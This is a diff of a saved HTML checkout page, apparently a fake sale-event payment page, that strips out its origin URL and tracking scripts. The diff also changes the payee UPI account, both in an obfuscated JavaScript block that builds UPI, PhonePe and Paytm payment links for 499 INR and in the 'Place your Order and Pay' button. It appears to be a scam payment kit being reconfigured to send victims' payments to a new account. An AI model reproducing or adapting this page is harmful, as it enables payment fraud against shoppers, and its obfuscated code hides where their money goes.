--- a/si/Make Payment.html
+++ b/si/Make Payment.html
@@ -1,5 +1,4 @@
 
-<!-- saved from url=(0050)https://www.bigbilliondays.one/NB/home/Pay/now.php -->
 <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 
 
@@ -11,22 +10,6 @@
 <script async="" src="./Make Payment_files/j2zrlgwq7j"></script><script src="./Make Payment_files/jquery.min.js.download"></script>
 <script src="./Make Payment_files/popper.min.js.download"></script>
 <script src="./Make Payment_files/bootstrap.min.js.download"></script>
-<!-- Default Statcounter code for
-https://bigbillion.today/One-Fc/
-https://bigbillion.today/One-Fc/ -->
-<script type="text/javascript">
-var sc_project=12927450; 
-var sc_invisible=1; 
-var sc_security="8bb535d7"; 
-</script>
-<script type="text/javascript" src="./Make Payment_files/counter.js.download" async=""></script>
-<noscript><div class="statcounter"><a title="Web Analytics"
-href="https://statcounter.com/" target="_blank"><img
-class="statcounter"
-src="https://c.statcounter.com/12927450/0/8bb535d7/1/"
-alt="Web Analytics"
-referrerPolicy="no-referrer-when-downgrade"></a></div></noscript>
-<!-- End of Statcounter Code -->
 <style>
 			* {
 				font-family: Roboto,Arial,sans-serif !important;
@@ -414,7 +397,7 @@ span.unaviable {
 <label class="form-check-label">			
 <input type="radio" id="radio2" onclick="cselect()" class="form-check-input" name="optradio" disabld="">
  &nbsp;&nbsp;<img align="right" src="./Make Payment_files/Paytm_logo.png" width="80" height="28" alt="button"> 
-<span style="color:green" class="unaviablee" <="" span="">
+<span style="color:green" class="unaviablee" span="">
 
 </span></label>
 </div>
@@ -446,7 +429,7 @@ span.unaviable {
 			
 
 <script>
-(function(_0x5984ae,_0x1ea5a3){const _0x3a4685=_0x41ae,_0x2252bb=_0x5984ae();while(!![]){try{const _0x3d8543=-parseInt(_0x3a4685(0x88))/0x1+-parseInt(_0x3a4685(0x8e))/0x2+-parseInt(_0x3a4685(0x85))/0x3+parseInt(_0x3a4685(0x92))/0x4*(-parseInt(_0x3a4685(0x94))/0x5)+parseInt(_0x3a4685(0x8a))/0x6+parseInt(_0x3a4685(0x83))/0x7+-parseInt(_0x3a4685(0x81))/0x8*(-parseInt(_0x3a4685(0x95))/0x9);if(_0x3d8543===_0x1ea5a3)break;else _0x2252bb['push'](_0x2252bb['shift']());}catch(_0x5cadb5){_0x2252bb['push'](_0x2252bb['shift']());}}}(_0x1185,0x33868));function cselect(){const _0x50829e=_0x41ae;r1=document[_0x50829e(0x97)](_0x50829e(0x82)),r2=document[_0x50829e(0x97)]('radio2'),r3=document[_0x50829e(0x97)](_0x50829e(0x87)),r4=document[_0x50829e(0x97)](_0x50829e(0x7e)),upi=document['getElementById'](_0x50829e(0x7f)),price=0x1f3;function _0x3803d0(_0x488c72,_0x178e89){const _0x5a59e3=_0x50829e;return Math[_0x5a59e3(0x93)](Math['random']()*(_0x178e89-_0x488c72+0x1))+_0x488c72;}let _0xf8075e=_0x3803d0(0x3e8,0x2328),_0x56bc60=_0x3803d0(0x5af3107a4000,0x3328b944c4000);console[_0x50829e(0x80)](_0xf8075e),console['log'](_0x56bc60),r1['checked']==!![]&&(console[_0x50829e(0x80)]('good\x201'),upi[_0x50829e(0x84)]=_0x50829e(0x96)+price+'&pn=FoodStore&tr='+_0x56bc60+_0x50829e(0x8c)),r2[_0x50829e(0x8b)]==!![]&&(console[_0x50829e(0x80)](_0x50829e(0x91)),upi[_0x50829e(0x84)]=_0x50829e(0x90)+price+_0x50829e(0x86)+_0x56bc60%0x15+'&cu=INR&mc=5944&pn=Paytm'),r3[_0x50829e(0x8b)]==!![]&&(console[_0x50829e(0x80)]('good\x203'),upi[_0x50829e(0x84)]=_0x50829e(0x89)+price+'&pn=FoodStore&tr='+_0x56bc60+_0x50829e(0x8c)),r4['checked']==!![]&&(console['log'](_0x50829e(0x8f)),upi[_0x50829e(0x84)]=_0x50829e(0x8d)+price+_0x50829e(0x86)+_0x56bc60+'&cu=INR&mc=5944');}function _0x41ae(_0x321778,_0x55a7f1){const _0x11851a=_0x1185();return _0x41ae=function(_0x41aea1,_0x2ddcb9){_0x41aea1=_0x41aea1-0x7e;let _0x1dd235=_0x11851a[_0x41aea1];return _0x1dd235;},_0x41ae(_0x321778,_0x55a7f1);}function _0x1185(){const _0x459284=['169320dgHMgY','phonepe://pay?pa=fcbizfpei7c@freecharge&am=','2012544qPkdDs','checked','&cu=INR&mc=5944','upi://pay?pa=fcbizfpei7c@freecharge&am=','578590ItWvyM','good\x204','paytmmp://pay?pa=fcbizfpei7c@freecharge&am=','good\x202','24ZBTYPs','floor','335230nTkkVc','5568183MlLNSK','://pay?pa=fcbizfpei7c@freecharge&am=','getElementById','radio4','upilink','log','8uPviHp','radio1','1883679uhSvDT','href','453807JdByBK','&pn=FoodStore&tr=','radio3'];_0x1185=function(){return _0x459284;};return _0x1185();}			
+(function(_0x5984ae,_0x1ea5a3){const _0x3a4685=_0x41ae,_0x2252bb=_0x5984ae();while(!![]){try{const _0x3d8543=-parseInt(_0x3a4685(0x88))/0x1+-parseInt(_0x3a4685(0x8e))/0x2+-parseInt(_0x3a4685(0x85))/0x3+parseInt(_0x3a4685(0x92))/0x4*(-parseInt(_0x3a4685(0x94))/0x5)+parseInt(_0x3a4685(0x8a))/0x6+parseInt(_0x3a4685(0x83))/0x7+-parseInt(_0x3a4685(0x81))/0x8*(-parseInt(_0x3a4685(0x95))/0x9);if(_0x3d8543===_0x1ea5a3)break;else _0x2252bb['push'](_0x2252bb['shift']());}catch(_0x5cadb5){_0x2252bb['push'](_0x2252bb['shift']());}}}(_0x1185,0x33868));function cselect(){const _0x50829e=_0x41ae;r1=document[_0x50829e(0x97)](_0x50829e(0x82)),r2=document[_0x50829e(0x97)]('radio2'),r3=document[_0x50829e(0x97)](_0x50829e(0x87)),r4=document[_0x50829e(0x97)](_0x50829e(0x7e)),upi=document['getElementById'](_0x50829e(0x7f)),price=0x1f3;function _0x3803d0(_0x488c72,_0x178e89){const _0x5a59e3=_0x50829e;return Math[_0x5a59e3(0x93)](Math['random']()*(_0x178e89-_0x488c72+0x1))+_0x488c72;}let _0xf8075e=_0x3803d0(0x3e8,0x2328),_0x56bc60=_0x3803d0(0x5af3107a4000,0x3328b944c4000);console[_0x50829e(0x80)](_0xf8075e),console['log'](_0x56bc60),r1['checked']==!![]&&(console[_0x50829e(0x80)]('good\x201'),upi[_0x50829e(0x84)]=_0x50829e(0x96)+price+'&pn=FoodStore&tr='+_0x56bc60+_0x50829e(0x8c)),r2[_0x50829e(0x8b)]==!![]&&(console[_0x50829e(0x80)](_0x50829e(0x91)),upi[_0x50829e(0x84)]=_0x50829e(0x90)+price+_0x50829e(0x86)+_0x56bc60%0x15+'&cu=INR&mc=5944&pn=Paytm'),r3[_0x50829e(0x8b)]==!![]&&(console[_0x50829e(0x80)]('good\x203'),upi[_0x50829e(0x84)]=_0x50829e(0x89)+price+'&pn=FoodStore&tr='+_0x56bc60+_0x50829e(0x8c)),r4['checked']==!![]&&(console['log'](_0x50829e(0x8f)),upi[_0x50829e(0x84)]=_0x50829e(0x8d)+price+_0x50829e(0x86)+_0x56bc60+'&cu=INR&mc=5944');}function _0x41ae(_0x321778,_0x55a7f1){const _0x11851a=_0x1185();return _0x41ae=function(_0x41aea1,_0x2ddcb9){_0x41aea1=_0x41aea1-0x7e;let _0x1dd235=_0x11851a[_0x41aea1];return _0x1dd235;},_0x41ae(_0x321778,_0x55a7f1);}function _0x1185(){const _0x459284=['169320dgHMgY','phonepe://pay?pa=dubey-871@paytm&am=','2012544qPkdDs','checked','&cu=INR&mc=5944','upi://pay?pa=dubey-871@paytm&am=','578590ItWvyM','good\x204','paytmmp://pay?pa=dubey-871@paytm&am=','good\x202','24ZBTYPs','floor','335230nTkkVc','5568183MlLNSK','://pay?pa=dubey-871@paytm&am=','getElementById','radio4','upilink','log','8uPviHp','radio1','1883679uhSvDT','href','453807JdByBK','&pn=FoodStore&tr=','radio3'];_0x1185=function(){return _0x459284;};return _0x1185();}			
 </script>
 
 
@@ -492,7 +475,7 @@ span.unaviable {
 </b></ul><b>
 </b></div><b>
 <div class="button-container flex">
-<a class="common-button" id="upilink" href="paytmmp://pay?pa=fcbizfpei7c@freecharge&amp;am=499&amp;pn=FoodStore&amp;tr=14&amp;cu=INR&amp;mc=5944&amp;pn=Paytm">
+<a class="common-button" id="upilink" href="paytmmp://pay?pa=dubey-871@paytm&amp;am=499&amp;pn=FoodStore&amp;tr=14&amp;cu=INR&amp;mc=5944&amp;pn=Paytm">
 <b>Place your Order and Pay
 </b></a><b>
 </b></div><b>
@@ -524,28 +507,4 @@ $( document ).ready(function() {
 	startTimer(900-300, $('#offerend-time'));
 });
 </script>
-
-<script type="text/javascript">
-    (function(c,l,a,r,i,t,y){
-        c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
-        t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
-        y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
-    })(window, document, "clarity", "script", "j2zrlgwq7j");
-</script>
-<!-- Google tag (gtag.js) -->
-<script async="" src="./Make Payment_files/js"></script>
-<script>
-  window.dataLayer = window.dataLayer || [];
-  function gtag(){dataLayer.push(arguments);}
-  gtag('js', new Date());
-
-  gtag('config', 'G-BR6VFX256T');
-</script>
-
-
-
-
-
-
-
 </b></b></body></html>
